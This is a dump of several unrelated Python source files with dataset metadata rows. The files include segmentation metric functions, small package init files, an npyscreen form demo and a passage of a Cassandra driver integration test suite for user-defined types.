] | null | null | null | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
] | null | null | null | """
utils module
"""
from .feature_list import feature_list | 15.75 | 38 | 0.714286 | 8 | 63 | 5.375 | 0.75 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174603 | 63 | 4 | 38 | 15.75 | 0.826923 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f099905ba86043f73a6df3a4319e7e15837e8887 | 3,556 | py | Python | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | import numpy as np
import torch
def dice_coef(y_pred: torch.Tensor,
y_true: torch.Tensor,
ts: float = 0.5,
eps: float = 1e-9):
assert y_pred.shape == y_true.shape
scores = []
n_samples = y_pred.shape[0]
preds = (y_pred > ts).float()
for i in range(n_samples):
pred = preds[i]
true = y_true[i]
intersect = 2.0 * (true * pred).sum()
union = true.sum() + pred.sum()
if true.sum() == 0 and pred.sum() == 0:
scores.append(1.0)
else:
scores.append((intersect + eps) / union)
return np.mean(scores)
def jaccard_coef(y_pred: torch.Tensor,
y_true: torch.Tensor,
ts: float = 0.5,
eps: float = 1e-9):
assert y_pred.shape == y_true.shape
scores = []
n_samples = y_pred.shape[0]
preds = (y_pred > ts).float()
for i in range(n_samples):
pred = preds[i]
true = y_true[i]
intersect = (pred * true).sum()
union = (true.sum() + pred.sum()) - intersect + eps
if true.sum() == 0 and pred.sum() == 0:
scores.append(1.0)
else:
scores.append((intersect + eps) / union)
return np.mean(scores)
def dice_coef_pc(probabilities: np.ndarray,
                 truth: np.ndarray,
                 threshold: float = 0.5,
                 eps: float = 1e-9,
                 classes: list = ['WT', 'TC', 'ET']) -> dict:
    """
    Calculate the Dice coefficient for a data batch, separately for each class.
    """
    scores = {key: list() for key in classes}
    num = probabilities.shape[0]
    num_classes = probabilities.shape[1]
    predictions = (probabilities >= threshold).astype(np.float32)
    assert (predictions.shape == truth.shape)
for i in range(num):
for class_ in range(num_classes):
prediction = predictions[i][class_]
truth_ = truth[i][class_]
intersection = 2.0 * (truth_ * prediction).sum()
union = truth_.sum() + prediction.sum()
if truth_.sum() == 0 and prediction.sum() == 0:
scores[classes[class_]].append(1.0)
else:
scores[classes[class_]].append((intersection + eps) / union)
return scores
def jaccard_coef_pc(probabilities: np.ndarray,
                    truth: np.ndarray,
                    threshold: float = 0.5,
                    eps: float = 1e-9,
                    classes: list = ['WT', 'TC', 'ET']) -> dict:
    """
    Calculate the Jaccard index for a data batch, separately for each class.
    Params:
        probabilities: model outputs after the activation function.
        truth: model targets.
        threshold: threshold for the probabilities.
        eps: additive term to avoid division by zero.
        classes: list of class names.
    Returns: dict with Jaccard scores for each class.
    """
    scores = {key: list() for key in classes}
    num = probabilities.shape[0]
    num_classes = probabilities.shape[1]
    predictions = (probabilities >= threshold).astype(np.float32)
    assert (predictions.shape == truth.shape)
for i in range(num):
for class_ in range(num_classes):
prediction = predictions[i][class_]
truth_ = truth[i][class_]
intersection = (prediction * truth_).sum()
union = (prediction.sum() + truth_.sum()) - intersection + eps
if truth_.sum() == 0 and prediction.sum() == 0:
scores[classes[class_]].append(1.0)
else:
scores[classes[class_]].append((intersection + eps) / union)
return scores
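The per-sample Dice formula used throughout this module can be sanity-checked on a tiny NumPy batch without torch; a minimal standalone sketch (the example arrays are made up for illustration):

```python
import numpy as np

def dice(pred: np.ndarray, true: np.ndarray, eps: float = 1e-9) -> float:
    # 2 * |A n B| / (|A| + |B|), with the all-empty case scored as 1.0
    intersect = 2.0 * (pred * true).sum()
    union = pred.sum() + true.sum()
    if union == 0:
        return 1.0
    return (intersect + eps) / union

pred = np.array([1, 1, 0, 0], dtype=np.float32)
true = np.array([1, 0, 1, 0], dtype=np.float32)
print(round(dice(pred, true), 3))  # one overlap out of two positives each -> 0.5
```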
| 34.862745 | 76 | 0.551181 | 427 | 3,556 | 4.482436 | 0.192037 | 0.020899 | 0.014629 | 0.020899 | 0.77116 | 0.77116 | 0.748171 | 0.748171 | 0.748171 | 0.748171 | 0 | 0.019127 | 0.323678 | 3,556 | 101 | 77 | 35.207921 | 0.776715 | 0.092801 | 0 | 0.825 | 0 | 0 | 0.003771 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f0be8f77f423547c26af9fd70d752da70a0c2036 | 186 | py | Python | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | 1 | 2018-11-19T14:14:24.000Z | 2018-11-19T14:14:24.000Z | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | null | null | null | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | null | null | null | import sentiment_mod as s
print(s.sentiment("This is utter flop movie and not worth the money "))
print(s.sentiment("One of the best sentimental and thriller movies i have ever seen"))
| 37.2 | 86 | 0.774194 | 33 | 186 | 4.333333 | 0.787879 | 0.083916 | 0.20979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150538 | 186 | 4 | 87 | 46.5 | 0.905063 | 0 | 0 | 0 | 0 | 0 | 0.607527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
9bd539dc90a283fab2a48056854fbe17837d92e6 | 124 | py | Python | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 75 | 2015-01-07T20:25:53.000Z | 2021-11-01T17:49:00.000Z | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 30 | 2015-01-07T19:57:58.000Z | 2021-08-31T09:14:33.000Z | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 46 | 2015-01-14T03:09:03.000Z | 2022-02-01T20:18:50.000Z | from .core import Images, resized_img_src, resized_img_size, resized_img_attrs, resized_img_tag
from .size import ImageSize
| 41.333333 | 95 | 0.854839 | 20 | 124 | 4.9 | 0.55 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 124 | 2 | 96 | 62 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
501956d5f6d3fecc12a6a351e24e95f90a3f027d | 1,437 | py | Python | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | 2 | 2015-01-12T14:47:19.000Z | 2018-10-03T09:27:22.000Z | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | null | null | null | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | 1 | 2020-03-20T20:19:33.000Z | 2020-03-20T20:19:33.000Z | #!/usr/bin/env python
import npyscreen
import EXAMPLE
#def Mainloop(scr):
# while 1:
# sampleform()
#
#def sampleform():
# F = npyscreen.Form(name = "Welcome to Npyscreen")
# t = F.add(npyscreen.TitleText, name = "Text:")
# p = F.add(npyscreen.TitlePassword, name = "Password:")
# fn = F.add(npyscreen.TitleFilename, name = "Filename:")
# s = F.add(npyscreen.TitleSlider, out_of=12, name = "Slider")
# ml= F.add(npyscreen.MultiLineEdit, value = "try typing here! Mutiline text, press ^R to reformat.", max_height=4)
# ms= F.add(npyscreen.MultiSelect, max_height=4, value = [1,], values = ["Option1","Option2","Option3"], scroll_exit=True)
class TestMem(npyscreen.NPSApp):
def main(self):
F = npyscreen.Form(name = "Welcome to Npyscreen")
t = F.add(npyscreen.TitleText, name = "Text:")
p = F.add(npyscreen.TitlePassword, name = "Password:")
fn = F.add(npyscreen.TitleFilename, name = "Filename:")
s = F.add(npyscreen.TitleSlider, out_of=12, name = "Slider")
ml= F.add(npyscreen.MultiLineEdit, value = "try typing here! Mutiline text, press ^R to reformat.", max_height=3, rely=7)
ms= F.add(npyscreen.MultiSelect, max_height=4, value = [1,], values = ["Option1","Option2","Option3"], scroll_exit=True)
F.display()
if __name__ == "__main__":
Test = TestMem()
Test.run()
while 1:
Test = TestMem()
Test.main()
| 38.837838 | 129 | 0.637439 | 186 | 1,437 | 4.83871 | 0.365591 | 0.053333 | 0.173333 | 0.04 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0 | 0.016522 | 0.199722 | 1,437 | 36 | 130 | 39.916667 | 0.766087 | 0.425887 | 0 | 0.111111 | 0 | 0 | 0.161529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.055556 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
501d0d7b7cd1729dbcb7bc36c20fcd11b26d5097 | 95 | py | Python | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | 1 | 2019-07-02T19:53:04.000Z | 2019-07-02T19:53:04.000Z | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | null | null | null | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | null | null | null | from fortniteversus import db
from fortniteversus.models import StoreItem
db.create_all()
| 10.555556 | 43 | 0.810526 | 12 | 95 | 6.333333 | 0.666667 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 8 | 44 | 11.875 | 0.938272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
acdb42a18331e099bd1333fa1de92a7c4a7bfe04 | 25,613 | py | Python | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | 1 | 2017-10-17T11:30:52.000Z | 2017-10-17T11:30:52.000Z | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | null | null | null | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cassandra.query import dict_factory
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import logging
log = logging.getLogger(__name__)
from collections import namedtuple
from cassandra.cluster import Cluster, UserTypeDoesNotExist
from tests.integration import get_server_versions, use_singledc, PROTOCOL_VERSION
from tests.integration.datatype_utils import get_sample, get_nonprim_sample,\
DATA_TYPE_PRIMITIVES, DATA_TYPE_NON_PRIMITIVE_NAMES
def setup_module():
use_singledc()
class TypeTests(unittest.TestCase):
def setUp(self):
if PROTOCOL_VERSION < 3:
raise unittest.SkipTest("v3 protocol is required for UDT tests")
self._cass_version, self._cql_version = get_server_versions()
def test_unprepared_registered_udts(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_unprepared_registered
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_unprepared_registered")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('age', 'name'))
c.register_user_type("udt_test_unprepared_registered", "user", User)
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User(42, 'bob')))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
self.assertTrue(type(row.b) is User)
# use the same UDT name in a different keyspace
s.execute("""
CREATE KEYSPACE udt_test_unprepared_registered2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_unprepared_registered2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('state', 'is_cool'))
c.register_user_type("udt_test_unprepared_registered2", "user", User)
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User('Texas', True)))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
self.assertTrue(type(row.b) is User)
c.shutdown()
def test_register_before_connecting(self):
User1 = namedtuple('user', ('age', 'name'))
User2 = namedtuple('user', ('state', 'is_cool'))
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_register_before_connecting
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_register_before_connecting")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
s.execute("""
CREATE KEYSPACE udt_test_register_before_connecting2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_register_before_connecting2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
# now that types are defined, shutdown and re-create Cluster
c.shutdown()
c = Cluster(protocol_version=PROTOCOL_VERSION)
c.register_user_type("udt_test_register_before_connecting", "user", User1)
c.register_user_type("udt_test_register_before_connecting2", "user", User2)
s = c.connect()
s.set_keyspace("udt_test_register_before_connecting")
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User1(42, 'bob')))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
self.assertTrue(type(row.b) is User1)
# use the same UDT name in a different keyspace
s.set_keyspace("udt_test_register_before_connecting2")
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User2('Texas', True)))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
self.assertTrue(type(row.b) is User2)
c.shutdown()
def test_prepared_unregistered_udts(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_prepared_unregistered
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_unregistered")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('age', 'name'))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User(42, 'bob')))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
# use the same UDT name in a different keyspace
s.execute("""
CREATE KEYSPACE udt_test_prepared_unregistered2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_unregistered2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('state', 'is_cool'))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User('Texas', True)))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
c.shutdown()

    def test_prepared_registered_udts(self):
        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        s.execute("""
            CREATE KEYSPACE udt_test_prepared_registered
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
            """)
        s.set_keyspace("udt_test_prepared_registered")
        s.execute("CREATE TYPE user (age int, name text)")
        User = namedtuple('user', ('age', 'name'))
        c.register_user_type("udt_test_prepared_registered", "user", User)
        s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
        insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
        s.execute(insert, (0, User(42, 'bob')))
        select = s.prepare("SELECT b FROM mytable WHERE a=?")
        result = s.execute(select, (0,))
        self.assertEqual(1, len(result))
        row = result[0]
        self.assertEqual(42, row.b.age)
        self.assertEqual('bob', row.b.name)
        self.assertTrue(type(row.b) is User)

        # use the same UDT name in a different keyspace
        s.execute("""
            CREATE KEYSPACE udt_test_prepared_registered2
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
            """)
        s.set_keyspace("udt_test_prepared_registered2")
        s.execute("CREATE TYPE user (state text, is_cool boolean)")
        User = namedtuple('user', ('state', 'is_cool'))
        c.register_user_type("udt_test_prepared_registered2", "user", User)
        s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
        insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
        s.execute(insert, (0, User('Texas', True)))
        select = s.prepare("SELECT b FROM mytable WHERE a=?")
        result = s.execute(select, (0,))
        self.assertEqual(1, len(result))
        row = result[0]
        self.assertEqual('Texas', row.b.state)
        self.assertEqual(True, row.b.is_cool)
        self.assertTrue(type(row.b) is User)

        c.shutdown()

    def test_udts_with_nulls(self):
        """
        Test UDTs with null and empty string fields.
        """
        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        s.execute("""
            CREATE KEYSPACE test_udts_with_nulls
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
            """)
        s.set_keyspace("test_udts_with_nulls")
        s.execute("CREATE TYPE user (a text, b int, c uuid, d blob)")
        User = namedtuple('user', ('a', 'b', 'c', 'd'))
        c.register_user_type("test_udts_with_nulls", "user", User)
        s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
        insert = s.prepare("INSERT INTO mytable (a, b) VALUES (0, ?)")
        s.execute(insert, [User(None, None, None, None)])
        results = s.execute("SELECT b FROM mytable WHERE a=0")
        self.assertEqual((None, None, None, None), results[0].b)
        select = s.prepare("SELECT b FROM mytable WHERE a=0")
        self.assertEqual((None, None, None, None), s.execute(select)[0].b)

        # also test empty strings
        s.execute(insert, [User('', None, None, '')])
        results = s.execute("SELECT b FROM mytable WHERE a=0")
        self.assertEqual(('', None, None, ''), results[0].b)
        self.assertEqual(('', None, None, ''), s.execute(select)[0].b)

        c.shutdown()
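The tuple-equality assertions above work because `namedtuple` subclasses `tuple`, so a mapped UDT row compares equal to a plain tuple field-by-field. A minimal standalone illustration:

```python
from collections import namedtuple

# namedtuple instances compare equal to plain tuples field-by-field,
# which is what lets assertEqual compare results[0].b against a tuple.
User = namedtuple('user', ('a', 'b', 'c', 'd'))

assert User(None, None, None, None) == (None, None, None, None)
assert User('', None, None, '') == ('', None, None, '')
```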

    def test_udt_sizes(self):
        """
        Test for ensuring extra-lengthy UDTs are handled correctly.
        """
        if self._cass_version < (2, 1, 0):
            raise unittest.SkipTest("User-defined types were introduced in Cassandra 2.1")

        MAX_TEST_LENGTH = 16384
        EXTENDED_QUERY_TIMEOUT = 60

        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        s.execute("""CREATE KEYSPACE test_udt_sizes
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
        s.set_keyspace("test_udt_sizes")

        # create the seed udt; increase the timeout to avoid the query failing on slow systems
        s.execute("CREATE TYPE lengthy_udt ({})"
                  .format(', '.join(['v_{} int'.format(i)
                                     for i in range(MAX_TEST_LENGTH)])), timeout=EXTENDED_QUERY_TIMEOUT)

        # create a table that holds the lengthy udt
        s.execute("CREATE TABLE mytable ("
                  "k int PRIMARY KEY, "
                  "v frozen<lengthy_udt>)", timeout=EXTENDED_QUERY_TIMEOUT)

        # create and register the seed udt type
        udt = namedtuple('lengthy_udt', tuple(['v_{}'.format(i) for i in range(MAX_TEST_LENGTH)]))
        c.register_user_type("test_udt_sizes", "lengthy_udt", udt)

        # verify inserts and reads for a spot-checked few sizes and the largest one
        for i in (0, 1, 2, 3, MAX_TEST_LENGTH):
            # create udt
            params = [j for j in range(i)] + [None for j in range(MAX_TEST_LENGTH - i)]
            created_udt = udt(*params)

            # write udt
            s.execute("INSERT INTO mytable (k, v) VALUES (0, %s)", (created_udt,))

            # verify the udt was written and read correctly; increase the timeout
            # to avoid the query failing on slow systems
            result = s.execute("SELECT v FROM mytable WHERE k=0", timeout=EXTENDED_QUERY_TIMEOUT)[0]
            self.assertEqual(created_udt, result.v)

        c.shutdown()

    def nested_udt_helper(self, udts, i):
        """
        Helper for creating nested udts.
        """
        if i == 0:
            return udts[0](42, 'Bob')
        else:
            return udts[i](self.nested_udt_helper(udts, i - 1))
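Away from Cassandra, the recursion above simply wraps the seed tuple once per nesting level. A plain-namedtuple sketch (the three `depth_*` classes here stand in for the registered UDT classes):

```python
from collections import namedtuple

depth_0 = namedtuple('depth_0', ('age', 'name'))
depth_1 = namedtuple('depth_1', ('value',))
depth_2 = namedtuple('depth_2', ('value',))
udts = [depth_0, depth_1, depth_2]

def nested(udts, i):
    # mirrors nested_udt_helper: depth 0 is the seed, each deeper level wraps it
    if i == 0:
        return udts[0](42, 'Bob')
    return udts[i](nested(udts, i - 1))

assert nested(udts, 2) == depth_2(depth_1(depth_0(42, 'Bob')))
assert nested(udts, 2).value.value.age == 42
```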

    def test_nested_registered_udts(self):
        """
        Test for ensuring nested udts are handled correctly.
        """
        if self._cass_version < (2, 1, 0):
            raise unittest.SkipTest("User-defined types were introduced in Cassandra 2.1")

        MAX_NESTING_DEPTH = 16

        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        # set the row_factory to dict_factory for programmatically accessing values
        s.row_factory = dict_factory
        s.execute("""CREATE KEYSPACE test_nested_registered_udts
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
        s.set_keyspace("test_nested_registered_udts")

        # create the seed udt
        s.execute("CREATE TYPE depth_0 (age int, name text)")

        # create the nested udts
        for i in range(MAX_NESTING_DEPTH):
            s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))

        # create a table with multiple sizes of nested udts
        # no need for all nested types, only a spot-checked few and the largest one
        s.execute("CREATE TABLE mytable ("
                  "k int PRIMARY KEY, "
                  "v_0 frozen<depth_0>, "
                  "v_1 frozen<depth_1>, "
                  "v_2 frozen<depth_2>, "
                  "v_3 frozen<depth_3>, "
                  "v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))

        # create the udt container
        udts = []

        # create and register the seed udt type
        udt = namedtuple('depth_0', ('age', 'name'))
        udts.append(udt)
        c.register_user_type("test_nested_registered_udts", "depth_0", udts[0])

        # create and register the nested udt types
        for i in range(MAX_NESTING_DEPTH):
            udt = namedtuple('depth_{}'.format(i + 1), ('value',))
            udts.append(udt)
            c.register_user_type("test_nested_registered_udts", "depth_{}".format(i + 1), udts[i + 1])

        # verify inserts and reads
        for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
            # create udt
            udt = self.nested_udt_helper(udts, i)

            # write udt
            s.execute("INSERT INTO mytable (k, v_%s) VALUES (0, %s)", (i, udt))

            # verify udt was written and read correctly
            result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
            self.assertEqual(udt, result['v_%s' % i])

        c.shutdown()

    def test_nested_unregistered_udts(self):
        """
        Test for ensuring nested unregistered udts are handled correctly.
        """
        if self._cass_version < (2, 1, 0):
            raise unittest.SkipTest("User-defined types were introduced in Cassandra 2.1")

        MAX_NESTING_DEPTH = 16

        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        # set the row_factory to dict_factory for programmatically accessing values
        s.row_factory = dict_factory
        s.execute("""CREATE KEYSPACE test_nested_unregistered_udts
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
        s.set_keyspace("test_nested_unregistered_udts")

        # create the seed udt
        s.execute("CREATE TYPE depth_0 (age int, name text)")

        # create the nested udts
        for i in range(MAX_NESTING_DEPTH):
            s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))

        # create a table with multiple sizes of nested udts
        # no need for all nested types, only a spot-checked few and the largest one
        s.execute("CREATE TABLE mytable ("
                  "k int PRIMARY KEY, "
                  "v_0 frozen<depth_0>, "
                  "v_1 frozen<depth_1>, "
                  "v_2 frozen<depth_2>, "
                  "v_3 frozen<depth_3>, "
                  "v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))

        # create the udt container
        udts = []

        # create the seed udt type (deliberately not registered with the cluster)
        udt = namedtuple('depth_0', ('age', 'name'))
        udts.append(udt)

        # create the nested udt types (deliberately not registered with the cluster)
        for i in range(MAX_NESTING_DEPTH):
            udt = namedtuple('depth_{}'.format(i + 1), ('value',))
            udts.append(udt)

        # verify inserts and reads
        for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
            # create udt
            udt = self.nested_udt_helper(udts, i)

            # write udt
            insert = s.prepare("INSERT INTO mytable (k, v_{0}) VALUES (0, ?)".format(i))
            s.execute(insert, (udt,))

            # verify udt was written and read correctly
            result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
            self.assertEqual(udt, result['v_%s' % i])

        c.shutdown()

    def test_nested_registered_udts_with_different_namedtuples(self):
        """
        Test for ensuring nested udts are handled correctly when the
        created namedtuples use names that differ from the CQL type names.

        Future improvement: optimize these three related tests using a single
        helper method to cut down on code repetition.
        """
        if self._cass_version < (2, 1, 0):
            raise unittest.SkipTest("User-defined types were introduced in Cassandra 2.1")

        MAX_NESTING_DEPTH = 16

        c = Cluster(protocol_version=PROTOCOL_VERSION)
        s = c.connect()
        # set the row_factory to dict_factory for programmatically accessing values
        s.row_factory = dict_factory
        s.execute("""CREATE KEYSPACE different_namedtuples
            WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
        s.set_keyspace("different_namedtuples")
